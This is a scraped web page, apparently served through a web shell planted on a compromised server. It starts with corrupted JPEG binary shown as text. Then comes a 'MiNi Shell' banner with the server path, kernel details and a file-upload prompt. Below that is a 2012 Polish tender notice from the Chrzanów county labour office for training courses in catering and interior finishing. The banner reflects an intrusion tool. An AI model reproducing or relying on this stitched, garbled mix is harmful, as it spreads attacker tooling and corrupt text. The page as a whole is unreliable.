JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120919/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120919/354816-N-2012.html

<p class="kh_header"><b>Chrzanów: Przedmiotem zamówienia jest  przeprowadzenie szkoleń zawodowych dla:
osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Chrzanowie  w specjalnościach:
Część 1:  Catering regionalny i dekorowanie stołów z modułem własnej działalności gospodarczej    - dla   8 osób,  
Część 2. Nowoczesne techniki wykańczania wnętrz - dla 8 osób.</b><br>
<b>Numer ogłoszenia: 354816 - 2012; data zamieszczenia: 19.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Chrzanowie , ul. Słowackiego 8, 32-500 Chrzanów, woj. małopolskie, tel. 032 7533800, faks 032 7533899.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup-chrzanow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest  przeprowadzenie szkoleń zawodowych dla:
osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Chrzanowie  w specjalnościach:
Część 1:  Catering regionalny i dekorowanie stołów z modułem własnej działalności gospodarczej    - dla   8 osób,  
Część 2. Nowoczesne techniki wykańczania wnętrz - dla 8 osób..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  przeprowadzenie szkoleń zawodowych dla:
osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Chrzanowie  w specjalnościach:
Część 1: Catering regionalny i dekorowanie stołów z modułem własnej działalności gospodarczej    -  dla   8 osób,  planowany termin realizacji:   październik - listopad   2012. 

Część 2. Nowoczesne techniki wykańczania wnętrz - dla 8 osób, planowany termin realizacji: październik - listopad   2012r..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, iż posiada aktualny wpis do Rejestru Instytucji Szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej  zgodnie z Rozporządzeniem Ministra Gospodarki i Pracy z dnia 27 października 2004r. w sprawie rejestru instytucji szkoleniowych Dz. U. Nr 236 poz. 2365) - dotyczy wszystkich części zamówienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. warunek ten zostanie spełniony, jeżeli Wykonawca wykaże się przeprowadzeniem z należytą starannością, co najmniej jednego szkolenia grupowego w  okresie ostatnich trzech lat ( dla min. 10 osób )  przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie - o tematyce tożsamej z przedmiotem zamówienia  dla poszczególnych części zamówienia ( załącznik nr 5 do SIWZ).  
2.	W przypadku rozbieżności pomiędzy nazwą szkolenia wskazaną w SIWZ a nazwą wykazaną w załączniku nr 5 w ocenie doświadczenia będą uwzględnione te szkolenia, w których Wykonawca wykaże,  że program tematyczny zrealizowanych przez niego  zamówień obejmował  co najmniej 70% wymaganego przez Zamawiającego minimum programowego wskazanego w załączniku 
nr 1 część II do SIWZ  ( stosownie do części zamówienia, której oferta dotyczy ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. warunek ten zostanie spełniony, jeżeli Wykonawca wykaże,  iż  na czas realizacji zamówienia będzie dysponował  urządzeniami  adekwatnymi do danej  części zamówienia umożliwiającymi realizację szkolenia ( załącznik nr  10 do  SIWZ),
 
Na jednego  uczestnika  musi przypadać  jedno stanowisko  szkoleniowe wyposażone w  niezbędne narzędzia  i materiały . Każdy z uczestników szkolenia powinien  mieć indywidualny  dostęp do sprzętu  i materiałów wykorzystywanych przy realizacji szkolenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże,  iż  na czas realizacji zamówienia będzie dysponował wykładowcą lub wykładowcami  do każdej z części zamówienia, które posiadają adekwatne do zakresu szkolenia  kwalifikacje, wykształcenie,  doświadczenie zawodowe ( załącznik nr 11 do  SIWZ). 
Przynajmniej jeden z wykładowców musi posiadać wykształcenie wyższe kierunkowe oraz uprawnienia pedagogiczne i co najmniej roczne doświadczenie w prowadzeniu szkoleń o tematyce zgodnej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Dokumenty potwierdzające należyte wykonanie usług - stosownie do części zamówienia, której dotyczy oferta.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Pisemne oświadczenie o niezaleganiu z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i spoleczne stanowiące zał. nr 9 do SIWZ
2. Pisemne oświadczenie o możliwości przeprowadzenia szkolenia na terenie powiatu chrzanowskiego.
3. Pisemne oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy PZP. 
4. Pisemne oświadczenie o posiadaniu aktualnego wpisu do Rejestru Instytucji Szkoleniowych w Wojewódzkim Urzędzie Pracy właściwym ze względu na siedzibę Wykonawcy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.70</li>
<li>2 - Doświadczenie wykonawcy - 0.20</li>
<li>3 - Posiadanie przez wykonawcę certyfikatów jakości usług - 0.05</li>
<li>4 - Rodzaj dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji - 0.05</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ust. 1 ustawy Prawo zamówień publicznych Zamawiający dopuszcza   możliwość  zmiany  postanowień  umowy, której wzór stanowi załącznik nr 8 do niniejszej   SIWZ. Zmiany mogą dotyczyć:
1.  zakresu  usług objętych umową,  w przypadku  zmian przepisów prawa w tym zakresie,
2. miejsca realizacji  świadczeń z  zastrzeżeniem lokalizacji na terenie powiatu chrzanowskiego,
3.  kadry wykonującej przedmiot zamówienia z przyczyn losowych ( za zgodą Zamawiającego ),
4.  terminu przeprowadzenia szkolenia  
5.   zmiana  kosztów szkolenia jeżeli te zmiany są korzystne dla  Zamawiającego,
6.  zmiana kosztu osobogodziny jeżeli  ta  zmiana jest  korzystna dla  Zamawiającego
7. zmiany w harmonogramie zajęć pod warunkiem zachowania terminu realizacji umowy zawartej w  § 5 oraz tego  że  plan nauczania będzie obejmował przeciętnie nie mniej niż 25 godzin zegarowych w tygodniu. Termin realizacji zamówienia może ulec zmianie tylko w szczególnie uzasadnionych przypadkach.

Warunkiem dokonania zmiany jest  zawiadomienie o zaistnieniu w/w okoliczności w formie pisemnej .

Ewentualne wprowadzenie wskazanych powyżej zmian do umowy nie może skutkować zwiększeniem wynagrodzenia wynikającego  z tytułu realizacji umowy.
Zgodę na  dokonanie zmian musi wyrazić każda ze stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup-chrzanow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy
ul. Słowackiego 8
32-500 Chrzanów
pok. 204.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.09.2012 godzina 08:30, miejsce: Powiatowy Urząd Pracy w Chrzanowie, ul. Słowackiego 8, 32-500 Chrzanów, Dziennik podawczy, parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Nowe Perspektywy realizowany w ramach PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI PRIORYTET VI Rynek pracy otwarty dla wszystkich DZIAŁANIE 6.1 Poprawa   dostępu do zatrudnienia oraz wspieranie aktywności zawodowej w regionie PODDZIAŁANIE 6.1.3 Poprawa zdolności do zatrudnienia oraz podnoszenie poziomu aktywności zawodowej osób bezrobotnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Catering regionalny i dekorowanie stołów z modułem własnej działalności gospodarczej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia: przeprowadzenie szkolenia dla  8  osób w specjalności: Catering regionalny i dekorowanie stołów z modułem własnej działalności gospodarczej. 

2.  Miejsce organizacji szkolenia:  powiat chrzanowski.

W przypadku przeprowadzenia zajęć poza miastem Chrzanów  instytucja szkoleniowa zobowiązuje się zapewnić dowóz uczestnikom szkolenia z Chrzanowa na miejsce odbywania zajęć i z powrotem. Koszt dowozu zostanie  wliczony do ceny szkolenia od jednej osoby i wykazany w odrębnej pozycji w preliminarzu kosztów szkolenia. 

3. Program szkolenia powinien obejmować  120 godzin dydaktycznych i powinno obejmować następujące moduły: 
1)	Przestrzeganie zasad bezpieczeństwa i higieny pracy.
2)	Organizowanie bankietów i działalność cateringowa.
3)	Usługi cateringowe - od oferty do realizacji.
4)	Planowanie, usługi podstawowe, rodzaje serwisu.
5)	Wybór miejsca, dobór sprzętu, karty menu.
6)	Charakterystyka kuchni regionalnej.
7)	Regionalne receptury i produkty ekologiczne. 
8)	Style serwowania, techniki noszenia naczyń.
9)	Szkło, sztućce, obrusy, przypinki, serwetki.
10)	Przygotowywanie potraw zgodnie z rodzajem przyjęcia. 
11)	Porcjowanie, dekoracja i ekspozycja potraw.
12)	Dekoracja stołu, estetyka, savoir-vivre.
13)	Profesjonalna obsługa klienta - przygotowanie potraw i napojów przy konsumencie, autoprezentacja.
14)	Przechowywanie i magazynowanie surowców, półproduktów i gotowych wyrobów żywnościowych.
15)	Catering w ujęciu marketingowym i sprzedażowym.
16)	Prawne aspekty realizacji usług cateringowych.
17)	Podstawowe zagadnienia sanitarno-epidemiologiczne
18)	Wdrażanie zasad utrzymania czystości  ( elementy systemu  HACCP )
19)	Obsługa kasy fiskalnej oraz czytników kodów kreskowych 
20)	Zakładanie i prowadzenie własnej działalności gospodarczej.

Liczba godz. 120, z czego zajęć praktycznych co najmniej 80. 

4. Sposób organizacji zajęć praktycznych: 
a)  W  ramach zajęć praktycznych uczestnicy nabędą m.in. następujące umiejętności:
a)	Porcjowania, dekorowania i ekspozycji potraw
b)	Dekorowania stołów
c)	Obsługi kasy fiskalnej oraz czytników kodów kreskowych
d)	Obsługi klienta.
b)  Wykonawca zabezpiecza sprzęt techniczny oraz materiały do zajęć praktycznych. 


5.	Czas trwania:  nie dłużej niż 20 kolejnych dni roboczych. 
6.	 Termin realizacji szkolenia:  październik - listopad  2012r. 
7.	Inne postanowienia:
Każdy uczestnik po pozytywnym zdaniu egzaminu otrzyma;
- Zaświadczenie wystawione na papierze firmowym stanowiącym załącznik nr 15 do SIWZ  zgodnie  z wymogami określonymi w § 75 ust. 3 Rozporządzenia Ministra Pracy  i Polityki Społecznej z dnia  14  września 2010 r. w sprawie standardów i warunków prowadzenia usług rynku pracy ( Dz. U. nr 177, poz. 1193 ).
-  Zaświadczenie na druku MEN jeśli instytucja posiada możliwość jego wystawienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 20.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.70</li>
<li>2. Doświadczenie wykonawcy - 0.20</li>
<li>3. Posiadanie przez Wykonawcę certyfikatów jakości usług - 0.05</li>
<li>4. Rodzaj dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Nowoczesne techniki wykańczania wnętrz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia: przeprowadzenie szkolenia dla  8  osób bezrobotnych w specjalności: Nowoczesne techniki wykańczania wnętrz. 

2.  Miejsce organizacji szkolenia:  powiat chrzanowski.
W przypadku przeprowadzenia zajęć poza miastem Chrzanów  instytucja szkoleniowa zobowiązuje się zapewnić dowóz uczestnikom szkolenia z Chrzanowa na miejsce odbywania zajęć i z powrotem. Koszt dowozu zostanie  wliczony do ceny szkolenia od jednej osoby. 

Zajęcia praktyczne zostaną przeprowadzone w obiekcie  użyteczności publicznej na terenie gminy Chrzanów.  Dokładne miejsce odbywania zajęć praktycznych  Zamawiający wskaże  przed podpisaniem umowy. 

3. Program szkolenia powinien obejmować  160 godzin dydaktycznych i zawierać następujące moduły:
1.	Organizacja pracy zgodnie z przepisami BHP i ppoż przy robotach malarsko-tapeciarskich, udzielanie pierwszej pomocy.
2.	Materiałoznawstwo:
a.	Materiały malarskie, rodzaje i przeznaczenie.
b.	Materiały tapeciarskie, rodzaje i przeznaczenie.
3.	Zasady i metody wykonywania robót tapeciarskich:
a.	Dobieranie właściwych narzędzi, sprzętu i aparatów do przygotowania podłoża oraz wykonywania prac tapeciarskich.
b.	Tapetowanie i wykańczanie powierzchni wytapetowanych.
4.	Zasady i metody wykonywania robót malarskich
a.	Dobieranie właściwych narzędzi, sprzętu i aparatów do przygotowania podłoża oraz wykonywania prac malarskich.
b.	Rozpoznawanie i przechowywanie materiałów do robót malarskich.
c.	Podział technik malarskich.
d.	Dobór farb do różnego rodzaju podłoży.
e.	Dobieranie rodzaju techniki malarskiej do rodzaju podłoża.
f.	Dobieranie kolorów do właściwości wnętrz.
g.	Tynki dekoracyjne: dekolux,  stiuk wenecki, trawertyn.
5.	Posługiwanie się dokumentacją techniczną.
a.	Rodzaje rysunków i ich przeznaczenie
b.	Skale rysunków
c.	Oznaczenia na rysunkach budowlanych
d.	Elementy składowe projektu budowlanego
e.	Czytanie dokumentacji technicznej
f.	Przeprowadzenie inwentaryzacji budowlanej
g.	Normy zuzycia materiałów
6.	Zajęcia praktyczne.
Liczba godz. 160, z czego zajęć praktycznych co najmniej 120. 

W programie szkolenia muszą być wykorzystane standardy kwalifikacji zawodowych i modułowych programów szkoleń zawodowych dostępnych pod adresem www.standardyiszkolenia.praca.gov.pl.

Program powinien zawierać wskazane powyżej  minimum programowe , które może zostać poszerzone o zagadnienia, które w ocenie Wykonawcy winny być zrealizowane celem odpowiedniego przygotowania uczestników szkolenia.

4.	Sposób organizacji zajęć praktycznych: 

1)	W ramach zajęć praktycznych uczestnicy szkolenia mają wykonać zakres prac związanych z remontem  pomieszczeń,  które  powinny obejmować :

a	przygotowanie podłoża do malowania ( ok. 150 m2) )
b	przygotowanie podłoża do tapetowania (ok. 150 m2  )
c	gruntowanie powierzchni
d	tapetowanie powierzchni pionowych ( ok. 150 m2 )
e	malowanie powierzchni pionowych różnymi farbami (ok. 150 m2 )
f	malowanie powierzchni sufitu ( 100m2 )
g	wykonywanie tynków ozdobnych m.in. trawertyn stiuk wenecki, dekolux. 

2)	Liczba godzin praktycznych: co najmniej 120.  

3) Wykonawca zabezpiecza sprzęt techniczny oraz materiały do zajęć praktycznych. 

5. Czas trwania: nie dłużej niż 28 kolejnych dni roboczych.  

6. Termin realizacji szkolenia:  październik / listopad  2012. 

7. Inne postanowienia:

Każdy uczestnik po pozytywnym zdaniu egzaminu otrzyma;
- Zaświadczenie wystawione na papierze firmowym stanowiącym załącznik nr 15 do SIWZ  zgodnie
 z wymogami określonymi w § 75 ust. 3 Rozporządzenia Ministra Pracy  i Polityki Społecznej z dnia
 14  września 2010 r. w sprawie standardów i warunków prowadzenia usług rynku pracy ( Dz. U. nr 177, poz. 1193 ).
